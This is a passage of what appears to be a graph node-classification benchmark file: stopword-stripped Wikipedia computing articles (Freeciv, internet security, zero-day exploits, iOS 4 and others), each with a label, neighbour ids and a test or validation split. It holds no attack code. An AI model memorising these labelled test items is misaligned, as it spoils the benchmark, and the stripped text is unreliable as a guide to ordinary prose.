2.0 released 2005 introduced several important changes became beneficial develop large cities full trade routes advanced technologies re-balancing various costs benefits introduction team playing features advanced diplomacy made coop gaming attractive developing one empire necessitated careful plan city development including phases rapture city populations grow quickly relatively peaceful conditions hence games almost always played teams typically took longer finish compared 1.x games 2006 tcp udp port number 5556 assigned freeciv iana 2017 hosted gna 15 years freeciv moved source repository github freeciv configurable specific rules played freeciv default mode civilization mode civilization ii mode custom mode one several players act game administrators configure game rules typically modified rules order play game freeciv user must start freeciv client connect freeciv server initially server pre-game phase phase clients connect game configuration parameters changed point server may ordered start game response creates game players nations game map assigns every player either freeciv client computer player specified configuration point game run ends terminated server never get back pre-game state user also start game directly client automatically starts freeciv server connects starts game freeciv graphics system configurable originally map display always overhead mode like civ isometric mode like civ ii iii optionally hexagonal tiling like civ v vi added later modes look customized switching alternative set graphics called tileset sounds replaced well freeciv supports human-to-human multiplayer gameplay artificial intelligence ai computer players game turn based human players move simultaneously ai players move separately partly start turn partly end releases 2.0 ai players could engage diplomatic relationships human players current releases ai players engage predictable rules-based diplomacy version 2.2.0 included map editor termed civworld create new scenarios well edit map currently played basic scripting available freeciv available civworld version 2.3 increased limit players 30 126 different clients available sdl gtk+ version3 xaw3d qt client added version 2.5 freeciv interface available 30 different languages addition gaelic covered bbc tv originally developed irix freeciv ported many different operating systems distributed many linux distributions offers installers microsoft windows known run mac os x morphos solaris ultrix qnx os/2 cygwin amigaos aros risc os maemo zeta skyos various bsds smartphones tablets running android version 2.4 mac os x version 2.3 windows versions older windows xp sp3 longer supported freeciv available portableapps format freeciv-web version freeciv playable online modern web browser supports 2d isometric graphics 3d graphics using webgl 3d version referred freeciv webgl 3d game fork freeciv project goal redesigning desktop game version played online freeciv-web introduced several new features play-by-email support freely available anyone online support playing game real-world map location choosing map using mapbox available commercial games genre game default settings closest civilization ii gameplay graphics including units isometric grid proposal create web-version freeciv made 6 april 2007 freeciv mailing lists documented freeciv.org wiki freeciv-web originally created andreas røsdal maintained several freeciv developers github freeciv-web free open source software freeciv c server released gnu general public license freeciv-web client released gnu affero general public license freeciv-web supports human-to-human multiplayer gameplay artificial intelligence ai computer players features similar freeciv c client although user-interface ported c client yet freeciv-web played online number servers two frequented http //www.freecivweb.org/ http //freeciv.xyz/ features required play full game freeciv place including rendering isometric map technology research many dialogs managing cities units players game also supports scenario-games includes maps world north america france italy japan iberian peninsula servers offer multiple varieties game single-player multiplayer free-for-all play-by-email longturn freeciv-web formerly playable play.freeciv.org march 3 2018 play.freeciv.org shut project revived april 8 group volunteers freecivweb.org freeciv longturn specialized large-group-multiplayer-online-strategy lagmos variant freeciv featuring daylong game turns large amounts human opponents per map allowing optimal timing build strategic plans readapt circumstances turn matches last anytime weeks months commonly involve 20 30 players one longturn first game called lt0 started around 2004 polish civilization fanpage civ.org.pl conducted longturn.net decided game bit slow paced new 3x movement ruleset devised – basically units movement points vision radius tripled july 2019 latest game lt47 changes settings rulesets discussed longturn forum greatturn similar concept another server since 2017 freeciv-web offers similar one turn per day variant gacivs mmo-rts variant freeciv ruleset devised support time-based instead turn-based strategy 2000 cnn placed freeciv among top 10 linux games holidays 2005 o'reilly article open source mac gaming freeciv recommended 2008 apcmag.com named freeciv among top 5 best free open source games linux format selected hotpick april 2010 october 2014 freeciv described example art unix programming eric s. raymond studies courses used freeciv platform experimenting design programming intelligent agents 2016 freeciv used challenge chess go commercial ai",
    "neighbors": [
      3462,
      3848,
      4490,
      6797,
      5397,
      11413,
      4777,
      10924,
      7983,
      823,
      9151,
      7872,
      9166,
      6993,
      11221,
      1121,
      3939,
      10480,
      370,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3940,
    "label": 2,
    "text": "OmniROM:omnirom omnirom open-source operating system smartphones tablet computers based android mobile platform involves number prominent developers projects omnirom founded reaction commercialisation rom project cyanogenmod launch project provided custom firmware based android jelly bean moved android kitkat shortly release kitkat firmware included support galaxy note ii galaxy note galaxy s3 galaxy s4 nexus 4 nexus 5 nexus 7 2012 lg optimus g galaxy s2 htc one 2013 oppo find 5 sony xperia acer iconia a500 htc explorer lenovo a6000 june 2015 project started release nightly builds based android lollipop asus transformer pad asus transformer pad infinity nexus 4 nexus 5 nexus 6 nexus 7 nexus 10 oppo find 7/7a oneplus one sony xperia z sony xperia zl project working new version firmware based android pie",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      7857,
      196,
      8907,
      8413,
      9949,
      1255,
      8940,
      5363,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      823,
      5431,
      2875,
      3900,
      7483,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      5067,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3941,
    "label": 4,
    "text": "Internet_security:internet security internet security branch computer security specifically related internet often involving browser security world wide web also network security applies applications operating systems whole objective establish rules measures use attacks internet internet represents insecure channel exchanging information leads high risk intrusion fraud phishing online viruses trojans worms many methods used protect transfer data including encryption from-the-ground-up engineering current focus prevention much real time protection well known new threats internet user tricked forced downloading software malicious intent onto computer software comes many forms viruses trojan horses spyware worms denial-of-service attack dos attack distributed denial-of-service attack ddos attack attempt make computer resource unavailable intended users another way understanding ddos seeing attacks cloud computing environment growing due essential characteristics cloud computing although means carry motives targets dos attack may vary generally consists concerted efforts prevent internet site service functioning efficiently temporarily indefinitely according businesses participated international business security survey 25 respondents experienced dos attack 2007 16.8 experienced one 2010 dos attacks often use bots botnet carry attack phishing attack targets online users extraction sensitive information username password credit card information phishing occurs attacker pretends trustworthy entity either via email web page victims directed fake web pages dressed look legitimate via spoof emails instant messenger/social media avenues often tactics email spoofing used make emails appear legitimate senders long complex subdomains hide real website host insurance group rsa said phishing accounted worldwide losses 10.8 billion 2016 applications used access internet resources may contain security vulnerabilities memory safety bugs flawed authentication checks severe bugs give network attackers full control computer security applications suites incapable adequate defense kinds attacks common widespread web-browser application vulnerability so-called cross-origin resource sharing vulnerability- maximum security privacy make sure adopt adequate countermeasures example patches provided webkit-based browsers tcp/ip protocols may secured cryptographic methods security protocols protocols include secure sockets layer ssl succeeded transport layer security tls web traffic pretty good privacy pgp email ipsec network layer security ipsec designed protect tcp/ip communication secure manner set security extensions developed internet task force ietf provides security authentication ip layer transforming data using encryption two main types transformation form basis ipsec authentication header ah esp two protocols provide data integrity data origin authentication anti-replay service protocols used alone combination provide desired set security services internet protocol ip layer basic components ipsec security architecture described terms following functionalities set security services provided ip layer includes access control data origin integrity protection replays confidentiality algorithm allows sets work independently without affecting parts implementation ipsec implementation operated host security gateway environment giving protection ip traffic multi-factor authentication mfa method computer access control user granted access successfully presenting several separate pieces evidence authentication mechanism – typically least two following categories knowledge something know possession something inherence something internet resources websites email may secured using multi-factor authentication online sites offer customers ability use six-digit code randomly changes every 30–60 seconds security token keys security token built mathematical computations manipulate numbers based current time built device means every thirty seconds certain array numbers possible would correct validate access online account website user logging would made aware device serial number would know computation correct time built device verify number given indeed one handful six-digit numbers works given 30-60 second cycle 30–60 seconds device present new random six-digit number log website email messages composed delivered stored multiple step process starts message composition user finishes composing message sends message transformed standard format rfc 2822 formatted message afterwards message transmitted using network connection mail client referred mail user agent mua connects mail transfer agent mta operating mail server mail client provides sender ’ identity server next using mail server commands client sends recipient list mail server client supplies message mail server receives processes message several events occur recipient server identification connection establishment message transmission using domain name system dns services sender ’ mail server determines mail server recipient server opens connection recipient mail server sends message employing process similar used originating client delivering message recipient pretty good privacy provides confidentiality encrypting messages transmitted data files stored using encryption algorithm triple des cast-128 email messages protected using cryptography various ways following first two methods message signing message body encryption often used together however encrypting transmissions mail servers typically used two organizations want protect emails regularly sent example organizations could establish virtual private network vpn encrypt communications mail servers internet unlike methods encrypt message body vpn encrypt entire messages including email header information senders recipients subjects cases organizations may need protect header information however vpn solution alone provide message signing mechanism provide protection email messages along entire route sender recipient mime transforms non-ascii data sender site network virtual terminal nvt ascii data delivers client simple mail transfer protocol smtp sent internet server smtp receiver side receives nvt ascii data delivers mime transformed back original non-ascii data message authentication code mac cryptography method uses secret key encrypt message method outputs mac value decrypted receiver using secret key used sender message authentication code protects message data integrity well authenticity computer firewall controls access networks generally consists gateways filters vary one firewall another firewalls also screen network traffic able block traffic dangerous firewalls act intermediate server smtp hypertext transfer protocol http connections firewalls impose restrictions incoming outgoing network packets private networks incoming outgoing traffic must pass firewall authorized traffic allowed pass firewalls create checkpoints internal private network public internet also known choke points borrowed identical military term combat limiting geographical feature firewalls create choke points based ip source tcp port number also serve platform ipsec using tunnel mode capability firewall used implement vpns firewalls also limit network exposure hiding internal network system information public internet packet filter first generation firewall processes network traffic packet-by-packet basis main job filter traffic remote ip host router needed connect internal network internet router known screening router screens packets leaving entering network stateful firewall circuit-level gateway proxy server operates network level open systems interconnection osi model statically defines traffic allowed circuit proxies forward network packets formatted unit data containing given port number port permitted algorithm main advantage proxy server ability provide network address translation nat hide user ip address internet effectively protecting internal information internet application-level firewall third generation firewall proxy server operates top osi model ip suite application level network packet forwarded connection established using known protocol application-level gateways notable analyzing entire messages rather individual packets data data sent received web browser statistics tend affect amount web browser exploited example internet explorer 6 used majority web browser market share considered extremely insecure vulnerabilities exploited due former popularity since browser choice evenly distributed internet explorer 28.5 firefox 18.4 google chrome 40.8 vulnerabilities exploited many different browsers antivirus software internet security programs protect programmable device attack detecting eliminating malware antivirus software mainly shareware early years internet several free security applications internet choose platforms password manager software application helps user store organize passwords password managers usually store passwords encrypted requiring user create master password single ideally strong password grants user access entire password database top bottom called security suites first offered sale 2003 mcafee contain suite firewalls anti-virus anti-spyware also offer theft protection portable storage device safety check private internet browsing cloud anti-spam file shredder make security-related decisions answering popup windows several free charge",
    "neighbors": [
      3072,
      2049,
      5636,
      6149,
      9221,
      10245,
      10756,
      9227,
      9233,
      4119,
      9242,
      9761,
      2084,
      4648,
      9256,
      6699,
      9771,
      1069,
      46,
      3629,
      6193,
      10801,
      5172,
      569,
      10297,
      571,
      3643,
      7739,
      9791,
      1088,
      4165,
      81,
      11345,
      8789,
      8283,
      5724,
      2654,
      9313,
      4194,
      101,
      4198,
      3688,
      6762,
      107,
      115,
      4725,
      5749,
      119,
      10872,
      2169,
      7289,
      10875,
      5245,
      5246,
      6786,
      5764,
      1157,
      5254,
      3724,
      9356,
      4245,
      4760,
      10392,
      1690,
      3742,
      2721,
      2213,
      3243,
      7855,
      9909,
      7352,
      4797,
      2238,
      3262,
      704,
      4287,
      7362,
      8386,
      8387,
      11455,
      6343,
      7368,
      10952,
      202,
      5325,
      2262,
      1239,
      6360,
      10457,
      4314,
      6364,
      6373,
      10477,
      239,
      4344,
      3320,
      2300,
      5373,
      5886,
      1279,
      4863,
      8956,
      9470,
      9983,
      4356,
      10492,
      9488,
      7441,
      8978,
      3347,
      4883,
      2325,
      278,
      4374,
      7955,
      10006,
      3867,
      4892,
      5404,
      6431,
      10015,
      5410,
      10020,
      8998,
      300,
      3885,
      3887,
      9523,
      5433,
      7996,
      11583,
      9537,
      3395,
      2887,
      4435,
      8022,
      9048,
      2907,
      4956,
      7515,
      5472,
      8032,
      11621,
      10600,
      2409,
      877,
      4462,
      4464,
      3956,
      4471,
      9591,
      1914,
      9087,
      9601,
      899,
      7044,
      4487,
      6024,
      1417,
      9607,
      9102,
      3473,
      7059,
      5531,
      9117,
      9630,
      2975,
      10141,
      10657,
      419,
      4522,
      939,
      9646,
      7600,
      1970,
      11186,
      10166,
      4023,
      6076,
      6588,
      11198,
      7103,
      9664,
      9154,
      3525,
      8133,
      9160,
      2508,
      9684,
      5078,
      5591,
      3032,
      9688,
      988,
      9181,
      9187,
      2539,
      7659,
      11244,
      2034,
      6643,
      5624,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3942,
    "label": 4,
    "text": "Shorewall:shorewall shorewall open source firewall tool linux builds upon netfilter iptables/ipchains system built linux kernel making easier manage complex configuration schemes providing higher level abstraction describing rules using text files daemon since run continuously rather configures rules kernel allow disallow traffic system shorewall configured group plain-text configuration files graphical user interface though webmin module available separately monitoring utility packaged shorewall used watch status system operates assist testing shorewall mainly used network installations opposed personal computer firewall since strength lies ability work zones dmz 'net zone zone would different rules making easy example relaxed rules company intranet yet clamp traffic coming internet plain-text configuration files usually well-commented easy use though shorewall may difficult new users handle firewall systems graphical front-ends recent stable version 5.2.3 18 february 2019 primary developer tom eastep announced retiring project 5.2.3 would final release starting version 4 shorewall began using perl-based compiler frontend previously used shell-based compiler frontend support ipv6 firewalling included since version 4.2.4",
    "neighbors": [
      1792,
      2049,
      4480,
      2563,
      8582,
      6797,
      1172,
      9496,
      3482,
      1436,
      4511,
      6431,
      10531,
      5924,
      550,
      8998,
      10790,
      3243,
      1708,
      3885,
      7983,
      8753,
      823,
      569,
      5178,
      11577,
      9279,
      5057,
      1858,
      10433,
      11073,
      2118,
      4814,
      9423,
      10574,
      7121,
      10451,
      10708,
      4568,
      4953,
      9048,
      2907,
      6364,
      5470,
      5860,
      10987,
      8943,
      8816,
      9971,
      10872,
      1273,
      9983
    ],
    "mask": "Test"
  },
  {
    "node_id": 3943,
    "label": 3,
    "text": "Compaq_Portable_III:compaq portable iii compaq portable iii pc/at-compatible computer released compaq computer corporation 1987 advertised much smaller lighter previous portable x86-pcs however still quite large today standards three models announced release model 1 list price equipped intel 80286 ram floppy colored gas-plasma display options included model 20 added model 40 upgraded also optional isa expansion chassis allowed 2 full length 16-bit isa add-in cards power supplied using mains electricity outlet battery exists",
    "neighbors": [
      5348,
      780,
      9166,
      2383,
      1776,
      7983,
      8786,
      499,
      1461,
      5368,
      11100
    ],
    "mask": "None"
  },
  {
    "node_id": 3944,
    "label": 4,
    "text": "Zero-day_(computing):zero-day computing zero-day also known 0-day vulnerability computer-software vulnerability unknown unaddressed interested mitigating vulnerability including vendor target software vulnerability mitigated hackers exploit adversely affect computer programs data additional computers network exploit directed zero-day called zero-day exploit zero-day attack jargon computer security day zero day interested party presumably vendor targeted system learns vulnerability leading vulnerability called zero-day vendor learns vulnerability vendor usually create patches advise workarounds mitigate fewer days since day zero higher chance fix mitigation developed even fix developed fewer days since day zero higher probability attack afflicted software successful every user software applied fix zero-day exploits unless vulnerability inadvertently fixed e.g unrelated update happens also obviate need fix specific vulnerability probability user applied vendor-supplied patch fixes problem zero exploit would remain available zero-day attacks severe threat malware writers exploit zero-day vulnerabilities several different attack vectors sometimes users visit rogue websites malicious code site exploit vulnerabilities web browsers web browsers particular target criminals widespread distribution usage cybercriminals well international vendors spyware israel ’ nso group also send malicious e-mail attachments via smtp exploit vulnerabilities application opening attachment exploits take advantage common file types numerous frequent evidenced increasing appearances databases like us-cert criminals engineer malware take advantage file type exploits compromise attacked systems steal confidential data time software exploit first becomes active time number vulnerable systems shrinks insignificance known window vulnerability wov time-line software vulnerability defined following main events thus formula length window vulnerability – formulation always true ≤ ≤ t. note day zero example hacker first discover vulnerability vendor might learn much later day zero normal vulnerabilities – 0 implies software vendor aware vulnerability time publish security patch hacker could craft workable exploit zero-day exploits – ≤ 0 exploit became active patch made available disclosing known vulnerabilities software vendor hopes reach reached thus avoiding exploits however vendor guarantees hackers find vulnerabilities furthermore hackers analyze security patches thereby discover underlying vulnerabilities automatically generate working exploits exploits used effectively time t. practice size wov varies systems vendors individual vulnerabilities often measured days one report 2006 estimating average 28 days zero-day protection ability provide protection zero-day exploits since zero-day attacks generally unknown public often difficult defend zero-day attacks often effective secure networks remain undetected even launched thus users so-called secure systems must also exercise common sense practice safe computing habits many techniques exist limit effectiveness zero-day memory corruption vulnerabilities buffer overflows protection mechanisms exist contemporary operating systems macos windows vista beyond see also security safety features new windows vista solaris linux unix unix-like environments windows xp service pack 2 includes limited protection generic memory corruption vulnerabilities previous versions include even less desktop server protection software also exists mitigate zero-day buffer overflow vulnerabilities typically technologies involve heuristic termination analysis—stopping cause harm suggested solution kind may reach algorithmically impossible general case analyze arbitrary code determine malicious analysis reduces halting problem linear bounded automaton unsolvable however unnecessary address general case sort programs categories malicious non-malicious circumstances order eliminate wide range malicious behaviors suffices recognize safety limited set programs e.g. access modify given subset machine resources rejecting safe unsafe programs require integrity safe programs maintained may prove difficult face kernel level exploit zeroday emergency response team zert group software engineers worked release non-vendor patches zero-day exploits march 9 2017 press release vault 7 documents released wikileaks 2 days previously julian assange states much leak remainder included unpatched vulnerabilities working companies microsoft google get vulnerabilities patched would release information would put public risk fixes released manufacturers would release details vulnerabilities zero-day worms take advantage surprise attack still unknown computer security professionals recent history shows increasing rate worm propagation well designed worms spread fast devastating consequences internet systems differing ideologies exist relative collection use zero-day vulnerability information many computer security vendors perform research zero-day vulnerabilities order better understand nature vulnerabilities exploitation individuals computer worms viruses alternatively vendors purchase vulnerabilities augment research capacity example program tippingpoint zero day initiative selling buying vulnerabilities technically illegal parts world lot controversy method disclosure 2006 german decision include article 6 convention cybercrime eu framework decision attacks information systems may make selling even manufacturing vulnerabilities illegal formal programs follow form rain forest puppy disclosure guidelines recent ois guidelines security vulnerability reporting response general rules forbid public disclosure vulnerabilities without notification vendor adequate time produce patch zero-day virus also known zero-day malware next-generation malware previously unknown computer virus malware specific antivirus software signatures yet available traditionally antivirus software relies upon signatures identify malware effective defend malware unless samples already obtained signatures generated updates distributed users signature-based approaches effective zero-day viruses modern antivirus software still uses signatures also carries types analysis code analysis machine code file analysed see anything looks suspicious typically malware characteristic behaviour code analysis attempts detect present code although useful code analysis significant limitations always easy determine section code intended particularly complex deliberately written intention defeating analysis another limitation code analysis time resources available competitive world antivirus software always balance effectiveness analysis time delay involved one approach overcome limitations code analysis antivirus software run suspect sections code safe sandbox observe behavior orders magnitude faster analyzing code must resist detect attempts code detect sandbox generic signatures signatures specific certain behaviour rather specific item malware new malware totally novel variation earlier malware contains code one earlier examples malware thus results previous analysis used new malware generally accepted antivirus industry vendors signature-based protection identically effective signature available item malware every product unless dysfunctional detect however vendors significantly faster others becoming aware new viruses and/or updating customers signature databases detect wide range effectiveness terms zero-day virus protection german computer magazine c't found detection rates zero-day viruses varied 20 68 primarily area zero-day virus performance manufacturers compete mid-april 2017 hackers known shadow brokers tsb —allegedly linked russian government—released files nsa initially regarded alleged nsa later confirmed internal details snowden include series 'zero-day exploits targeting microsoft windows software tool penetrate society worldwide interbank financial telecommunication swift service provider ars technica reported shadow brokers hacking claims mid-january 2017 april shadow brokers posted exploits proof vulnerabilities equities process first revealed publicly 2016 process used u.s. federal government determine case-by-case basis treat zero-day computer security vulnerabilities whether disclose public help improve general computer security keep secret offensive use government adversaries process criticized number deficiencies including restriction non-disclosure agreements lack risk ratings special treatment nsa less whole-hearted commitment disclosure default option virus signature unique pattern code used detect identify specific viruses antivirus scans file signatures compares database known malicious codes match file flagged treated threat major limitation signature-based detection capable flagging already known malware making completely useless zero-day attacks chronological order",
    "neighbors": [
      3843,
      5636,
      6917,
      11400,
      6797,
      3473,
      4755,
      3092,
      8212,
      8726,
      9364,
      10392,
      6169,
      7578,
      3742,
      1440,
      5024,
      2213,
      3495,
      297,
      2734,
      2737,
      10110,
      5173,
      6326,
      823,
      9909,
      11577,
      6586,
      7739,
      711,
      10442,
      971,
      9424,
      3286,
      1496,
      1242,
      7515,
      11611,
      4830,
      3423,
      9569,
      9442,
      612,
      2148,
      11365,
      9447,
      5866,
      2027,
      4972,
      8172,
      2542,
      4081,
      5490,
      5492,
      2041,
      9082,
      7421,
      2558,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3945,
    "label": 3,
    "text": "DEC_Multia:dec multia multia later re-branded universal desktop box line desktop computers introduced digital equipment corporation 7 november 1994 line notable units offered either alpha axp intel pentium processor cpu hardware backplane cpu interchangeable alpha intel versions intended run windows nt multia compact case left little room expansion cards restricted air flow cause premature hardware failure due overheating properly cared enthusiasts remedy placing multia vertically instead horizontally allowing heated air escape via vents top although still requires preventing multia overheating due factors e.g environmental alpha multias included either alpha 21066 alpha 21066a microprocessor running 166 mhz 233 mhz respectively came 16 24 mb ram standard expandable 128 mb officially practice 256 mb 21066 budget version alpha 21064 processor narrower 64-bit versus 128-bit slower bus thus performance roughly equivalent pentium running 100 mhz integer operations superior floating-point furthermore standard ram capacity severe restriction performance workstations alpha-based multias came tga dec 21030 graphics adapter standard peripherals alpha intel models included scsi host adapter dec 21040 ethernet controller two pcmcia slots two rs-232 ports bi-directional parallel port 2.5 3.5 scsi ata hard disk 340 mb 1.6 gb ps/2 keyboard mouse ports pci slot models 2.5-inch hard disks multia models comprised 1996 digital began offering alpha multia without windows nt renamed line universal desktop box nicknamed udb prices quite low first time many enthusiasts hobbyists could afford alpha axp-based computer multia udb run windows nt alpha windows nt 4.0 service pack 6 although windows 2000 never officially released alpha platform windows 2000 beta released fact runs multia linux netbsd available multia additionally digital unix openvms configured run multia certain limitations although initially operating systems disabled running budget multia line alpha-based multia came configured arc firmware console running windows nt although srm also available intel-based multia used bios",
    "neighbors": [
      780,
      9742,
      8976,
      8851,
      2452,
      8474,
      8732,
      6942,
      3250,
      823,
      7234,
      3142,
      8390,
      2383,
      11604,
      10220,
      1776,
      5873,
      499,
      9723
    ],
    "mask": "Test"
  },
  {
    "node_id": 3946,
    "label": 0,
    "text": "Audio-visual_speech_recognition:audio-visual speech recognition audio visual speech recognition avsr technique uses image processing capabilities lip reading aid speech recognition systems recognizing undeterministic phones giving preponderance among near probability decisions system lip reading speech recognition works separately results mixed stage feature fusion name suggests two parts first one audio part second one visual part audio part use features like log mel spectogram mfcc etc raw audio samples build model get feature vector visual part generally use variant convolutional neural network compress image feature vector concatenate two vectors audio visual try predict target object",
    "neighbors": [
      5648,
      1890,
      10557
    ],
    "mask": "None"
  },
  {
    "node_id": 3947,
    "label": 0,
    "text": "Synchronous_context-free_grammar:synchronous context-free grammar synchronous context-free grammars syncfg scfg confused stochastic cfgs type formal grammar designed use transfer-based machine translation rules grammars apply two languages time capturing grammatical structures translations theory syncfgs borrows syntax-directed transduction syntax-based machine translation modeling reordering clauses occurs translating sentence correspondences phrase-structure rules source target languages performance scfg-based mt systems found comparable even better state-of-the-art phrase-based machine translation systems several algorithms exist perform translation using syncfgs rules syncfg superficially similar cfg rules except specify structure two phrases time one source language language translated one target language numeric indices indicate correspondences non-terminals constituent trees chiang gives chinese/english example rule indicates phrase formed chinese structure yu variables standing subphrases corresponding structure english independently translated english",
    "neighbors": [
      1490,
      2578
    ],
    "mask": "Test"
  },
  {
    "node_id": 3948,
    "label": 2,
    "text": "IOS_4:ios 4 ios 4 fourth major release ios mobile operating system developed apple inc. successor iphone os 3 announced company worldwide developers conference june 7 2010 released june 21 2010. ios 4 first ios version issued ios rebranding dropping iphone os naming convention previous versions succeeded ios 5 october 12 2011. ios 4 introduced folders home screen significantly increasing number apps displayed support custom wallpapers also added although limited newer devices due animation performance requirements operating system also added multitasking feature letting apps dealing internet calling location audio playback function background whereas similar restricted fast app switching technology enabled app left inactive background users switch apps ios 4 also added system-wide spell checking feature enabled ibooks iphone unified mail inbox combine content different email providers introduced game center social gaming facetime video calling ios 4 update introduced performance battery problems iphone 3g devices apple investigating matter promising then-upcoming updates however company became subject lawsuit unsatisfied customer issues around time release iphone 4 subsequent antenna problems made apple focus unsuccessfully attempting patch issues software updates ios 4 introduced apple worldwide developers conference keynote address june 7 2010 notably first ios release named simply ios ditched iphone os naming pattern previous versions ios 4 officially released june 21 2010. ios 4.0.1 released july 15 2010 first update ios 4 update changed method calculating carrier signal strength improved accuracy ios 4.0.2 released august 11 2010 fix exploit taking advantage pdf file format vulnerabilities ios 4.1 released september 8 2010 update included high dynamic range hdr technology improved quality photos captured iphone 4 added game center social gaming network ability upload high definition videos captured iphone 4 youtube mobileme also featured bug fixes performance improvements ios 4.2.1 released november 22 2010 first version bring major ios 4 features introduced iphone ipad although ios 4.2 released developers testing purposes bugs discovered replaced 4.2.1 consumer release also last version ios run iphone 3g ipod touch 2nd generation due hardware limitations performance issues ios 4.2.5 announced january 11 2011 adding exclusive wi-fi hotspot support cdma version iphone 4. ios 4.3 released march 4 2011 adding support personal wi-fi hotspots itunes home sharing improvements airplay minor improvements ipad 1 run ios 4.3 due hardware restrictions ios 4.3.1 released march 25 2011 fix ipod touch screen glitches along stability improvements cellular connectivity iphone models ios 4.3.2 released april 14 2011 fixes frozen calls facetime connectivity issues cellular models ipad ios 4.3.3 released may 4 2011 fix location bugs ios 4.3.4 released july 15 2011 fixing security vulnerabilities ios 4.3.5 released july 25 2011 security update fix certificate validation ios 4 raised maximum number home screen apps 180 2,160 due addition folders folders would automatically named based containing apps respective app store category ability add custom wallpapers home screen also added though feature notably absent iphone 3g second-generation ipod touch due poor performance icon animations ios 4 introduced multitasking feature allowed users switch apps instantly double-clicking home button implemented way cause excessive battery drain multitasking limited apps dealing internet calling location audio playback similar fast app switching technology meant users could leave app enter another original app remaining background user returns feature notably absent iphone 3g second-generation ipod touch due performance issues ios 4 introduced spell checking feature underlined misspelled words red tapping word would provide pop-up recommended replacement camera app could take pictures 5 times digital zoom ios 4 introduced iphone ipod touch support ibooks already included ipad though default app available app store mail app featured unified inbox ios 4 allowing users see messages email accounts displayed together single inbox also gained support mobileme e-mail aliases multiple exchange accounts business users ios 4.1 added new app called game center online multiplayer social gaming network allows users invite friends play games compare scores leaderboard available iphone 3g ios 4 introduced facetime videotelephony app uses device camera allow user make video calls facetime users feature absent iphone 3gs third-generation ipod touch lower due lack required features front-facing camera safari mobile web browser ios 4 added bing search option addition google yahoo ios 4.2 specific words phrases page searched iphone 3g users reported performance battery issues upgrading ios 4 apple started investigation matter july 2010 november apple sued issues unsatisfied customer alleging violating consumer legal remedies act unfair business practices false deceptive advertising allegations apple knew software would cause problems older models apple n't responded allegations wrote reply another unsatisfied customer august updates coming soon versions ios 4 alarm clock clock app problem dst would go hour early late upon release iphone 4 users reported technical problems phone antennas apple attempted fix issue ios 4.0.1 failed first-generation iphone first-generation ipod touch run ios 4 due hardware limitations marked first time apple dropped support older devices",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      6675,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8767,
      576,
      5696,
      8774,
      8783,
      4180,
      10838,
      1623,
      3672,
      9308,
      8285,
      3167,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      10888,
      5784,
      1177,
      4251,
      3228,
      2207,
      10406,
      11430,
      3241,
      171,
      5292,
      2735,
      3248,
      1715,
      4283,
      3772,
      7869,
      3790,
      7378,
      2259,
      7893,
      3286,
      9430,
      3293,
      4318,
      6884,
      10470,
      231,
      6377,
      2282,
      9451,
      1772,
      4844,
      10478,
      5363,
      7928,
      8441,
      11513,
      7420,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      10052,
      11589,
      838,
      7496,
      4957,
      6495,
      9063,
      10602,
      10608,
      7029,
      2439,
      6023,
      1930,
      6539,
      7052,
      7057,
      3483,
      2979,
      9123,
      11171,
      8109,
      8627,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      5093,
      487,
      488,
      2023,
      8170,
      7154,
      5619,
      11257,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3949,
    "label": 2,
    "text": "BlackBerry_Enterprise_Server:blackberry enterprise server blackberry enterprise server designates middleware software package part blackberry wireless platform supplied blackberry limited software service connects messaging collaboration software mdaemon messaging server microsoft exchange lotus domino novell groupwise enterprise networks redirects emails synchronizes contacts calendaring information servers desktop workstations mobile devices third-party connectors exist including scalix zarafa zimbra google apps bes connector although supported blackberry limited june 2018 blackberry enterprise server renamed blackberry unified endpoint manager uem prior version 4.0 bes largely two separate codebases 2.2 version domino 3.6 version exchange version 4.0 beyond much code integrated separate distributions still remain supported mail platform beginning version 4.1.2 company introduced new option blackberry enterprise server applications provides secure wireless gateway blackberry devices without requiring device owner possess email account latest major revision version 5.0 released 2009 exchange domino support groupwise added 2010 support growing number multiple devices ownership models operating environments blackberry reinvented enterprise mobility management emm bringing together mobile device management security unified communications applications launching blackberry enterprise service 10 bes 10 represents unification simplification products deliver integrated end-to-end solution mobile device management enables enterprises manage entire device fleet ever types devices brands ownership operating system blackberry 10 ios android type usage security enables enterprises secured end-to-end mobility unified communication enables enterprises integrate voice messaging pim apps social experiences applications enables enterprises manage business productivity personal apps bes 5 consists set windows services carry basic operations system windows services include additional services may installed depending configuration bes also produces set log files operation called bes event log log files include bes v4.0 4.1 system connecting microsoft exchange bes typically deployed managed within enterprise messaging administrators example individuals already responsible managing microsoft exchange lotus domino novell groupwise sometimes dedicated person usually called blackberry bes administrator 2010 rim offering blackberry enterprise server express edition user limitations free minor feature limitations requires data plan bes plan enables near-instant seamless mail calendar integration existing exchange server incoming emails often appear blackberry handset appear outlook owa clients advantage existing outlook web access model blackberry internet service offers.the free download requires license code may delayed due demand january 2007 rim offering free version bes called blackberry professional software free download blackberry website includes 1 user license bpse provides ... wireless communications collaboration solution designed specifically small medium-sized businesses comes one cal client access license meaning one blackberry handheld activated server add 29 additional cals total 30 upgrade blackberry enterprise server time.it available notes exchange environments bps based 4.1 code simplified management tool limited amount patches released bps stuck v 4.1.4 full bes 4.1.6 plus maintenance releases bps missing functions full 